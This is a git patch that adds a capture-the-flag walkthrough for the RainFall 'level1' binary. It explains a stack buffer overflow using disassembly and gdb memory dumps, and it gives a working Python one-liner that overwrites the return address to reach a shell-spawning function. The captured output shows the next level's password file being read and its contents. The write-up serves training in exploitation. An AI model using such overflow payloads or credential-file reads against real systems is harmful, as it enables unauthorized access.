From 527e40164b3f63cb1716012d21c39b995a087a59 Mon Sep 17 00:00:00 2001
From: gbrochar
Date: Mon, 19 May 2025 16:56:51 +0200
Subject: [PATCH] chore: level1 walktrough

---
 level1/Ressources/exploit.txt | 1 -
 level1/Ressources/walktrough.md | 93 +++++++++++++++++++++++++++++++++
 2 files changed, 93 insertions(+), 1 deletion(-)
 delete mode 100644 level1/Ressources/exploit.txt
 create mode 100644 level1/Ressources/walktrough.md

diff --git a/level1/Ressources/exploit.txt b/level1/Ressources/exploit.txt
deleted file mode 100644
index 007843c..0000000
--- a/level1/Ressources/exploit.txt
+++ /dev/null
@@ -1 +0,0 @@
-D
diff --git a/level1/Ressources/walktrough.md b/level1/Ressources/walktrough.md
new file mode 100644
index 0000000..1326a00
--- /dev/null
+++ b/level1/Ressources/walktrough.md
@@ -0,0 +1,93 @@
+Code has 2 functions which are interesting, main and run.
+We need to execute run, for this we are going to use a buffer overflow attack.
+For this we've got to input more than the 64 bits allocated for gets command.
+We are going to override the stack so the ret command jump to run function.
+
+```
+0x08048480 : push ebp
+0x08048481 : mov ebp,esp
+0x08048483 : and esp,0xfffffff0
+0x08048486 : sub esp,0x50
+0x08048489 : lea eax,[esp+0x10]
+0x0804848d : mov DWORD PTR [esp],eax
+0x08048490 : call 0x8048340
+0x08048495 : leave
+0x08048496 : ret
+```
+
+```
+0x08048444 : push ebp
+0x08048445 : mov ebp,esp
+0x08048447 : sub esp,0x18
+0x0804844a : mov eax,ds:0x80497c0
+0x0804844f : mov edx,eax
+0x08048451 : mov eax,0x8048570
+0x08048456 : mov DWORD PTR [esp+0xc],edx
+0x0804845a : mov DWORD PTR [esp+0x8],0x13
+0x08048462 : mov DWORD PTR [esp+0x4],0x1
+0x0804846a : mov DWORD PTR [esp],eax
+0x0804846d : call 0x8048350
+0x08048472 : mov DWORD PTR [esp],0x8048584
+0x08048479 : call 0x8048360
+0x0804847e : leave
+0x0804847f : ret
+```
+
+Fig 1. Disassembly of main and run functions
+
+The first step is to find where the ret address is stored, for this, we will
+stop the program just before it begins running main and check esp register's
+value.
+
+```
+Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done.
+(gdb) b *main+0
+Breakpoint 1 at 0x8048480
+(gdb) run
+Starting program: /home/user/level1/level1
+
+Breakpoint 1, 0x08048480 in main ()
+(gdb) p $esp
+$1 = (void *) 0xbffff73c
+(gdb)
+```
+
+Now we need to go to the gets and input 64 random characters and try to see them
+on the stack
+
+```
+Breakpoint 1, 0x08048495 in main ()
+(gdb) x/128xb $esp
+0xbffff6e0: 0xf0 0xf6 0xff 0xbf 0x2f 0x00 0x00 0x00
+0xbffff6e8: 0x3c 0xf7 0xff 0xbf 0xf4 0x0f 0xfd 0xb7
+0xbffff6f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff6f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff700: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff708: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff710: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff718: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff720: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff728: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
+0xbffff730: 0x00 0x84 0x04 0x08 0x00 0x00 0x00 0x00
+0xbffff738: 0x00 0x00 0x00 0x00 0xd3 0x54 0xe4 0xb7
+0xbffff740: 0x01 0x00 0x00 0x00 0xd4 0xf7 0xff 0xbf
+0xbffff748: 0xdc 0xf7 0xff 0xbf 0x58 0xc8 0xfd 0xb7
+0xbffff750: 0x00 0x00 0x00 0x00 0x1c 0xf7 0xff 0xbf
+0xbffff758: 0xdc 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00
+```
+
+We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c.
+That means we still need to put more 'A's, 12 precisely, then the address we want
+to jump to.
+
+```(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1```
+
+```level1@RainFall:~$ (python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1
+Good... Wait what?
+whoami
+level2
+cat /home/user/level2/.pass
+53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
+```
+
+:)